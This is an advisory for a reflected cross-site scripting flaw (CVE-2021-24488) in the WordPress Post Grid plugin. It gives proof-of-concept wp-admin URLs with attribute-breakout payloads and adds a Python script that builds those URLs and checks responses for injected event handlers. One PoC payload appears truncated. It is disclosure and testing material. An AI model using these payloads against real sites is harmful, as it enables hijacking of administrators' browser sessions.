# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/post-grid/
# Version: 2.1.1
# Tested on: Windows 10
# CVE: CVE-2021-24488

1. Description:
This plugin creates a post grid from any post type. Two admin-side GET parameters are reflected into the page without output encoding: the keyword parameter of the slider/layout import search (page=import_layouts) and the tab parameter of the plugin settings page (page=post-grid-settings). Both endpoints live under wp-admin, so the attack is a crafted link opened by a logged-in user; the injected script then runs in that user's browser and session (reflected cross-site scripting).

2. Proof of Concept:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab=">
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

The keyword payload closes the quoted attribute the search term is echoed into and adds an onmouseover handler, so hovering the affected element runs alert(1).
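The following is an added example, not part of the 0xB9 advisory and not code from the Post Grid plugin. It builds the advisory's two PoC URLs for a site of the tester's choosing and checks a response body for what the keyword payload is trying to achieve: breaking out of a quoted attribute and planting an on* event handler. The base URL, the form layout in the sample bodies, and the assumption that the search term is echoed into a value="" attribute are all assumptions; the HTML bodies are constructed for illustration, not captured from the plugin.

```python
"""Reflected-XSS reflection check for the Post Grid PoC parameters.
Added example, not the advisory's or the plugin's own code."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin

# Payloads exactly as given in the advisory's proof of concept.
TAB_PAYLOAD = '">'
KEYWORD_PAYLOAD = '"onmouseover=alert(1)//'


def poc_urls(base_url):
    """Return (settings_url, import_url) for a WordPress site at base_url.
    base_url is an assumption supplied by the caller, e.g. https://example.test/."""
    edit = urljoin(base_url, "wp-admin/edit.php")
    settings = edit + "?" + urlencode(
        {"post_type": "post_grid", "page": "post-grid-settings", "tab": TAB_PAYLOAD})
    imports = edit + "?" + urlencode(
        {"post_type": "post_grid", "page": "import_layouts", "keyword": KEYWORD_PAYLOAD})
    return settings, imports


class HandlerFinder(HTMLParser):
    """Collect every (tag, attribute) pair whose attribute name starts with 'on'.
    A reflected value that escaped its attribute shows up here; a properly
    encoded one stays inside the attribute value and does not."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name))


def injected_handlers(body):
    """Parse an HTML response body and return the on* attributes it contains."""
    finder = HandlerFinder()
    finder.feed(body)
    finder.close()
    return finder.handlers


def reflected_raw(body, payload=KEYWORD_PAYLOAD):
    """Cheaper check: is the payload echoed byte-for-byte (quote unencoded)?"""
    return payload in body


# Constructed sample bodies (assumption: the search term is echoed into a
# value="" attribute, which is what the payload's leading quote relies on).
VULNERABLE_BODY = (
    f'<form><input type="text" name="keyword" value="{KEYWORD_PAYLOAD}"></form>')
# escape(..., quote=True) encodes the quote the way WordPress esc_attr() would;
# this models a correct fix, not the plugin's actual patch.
FIXED_BODY = (
    f'<form><input type="text" name="keyword" '
    f'value="{escape(KEYWORD_PAYLOAD, quote=True)}"></form>')

if __name__ == "__main__":
    for url in poc_urls("https://example.test/"):
        print(url)
    print("vulnerable:", injected_handlers(VULNERABLE_BODY))
    print("fixed:     ", injected_handlers(FIXED_BODY))
```

To use it against a real target, fetch each PoC URL with an authenticated wp-admin session and pass the response body to injected_handlers(); an empty list on a body that still contains the keyword (only as &quot;onmouseover...) indicates the value is now encoded in the attribute context, while a non-empty list reproduces the advisory's attribute break. Note that this only checks the attribute context the payload targets; a parameter echoed elsewhere (inside a script block, for instance) needs a different payload and check.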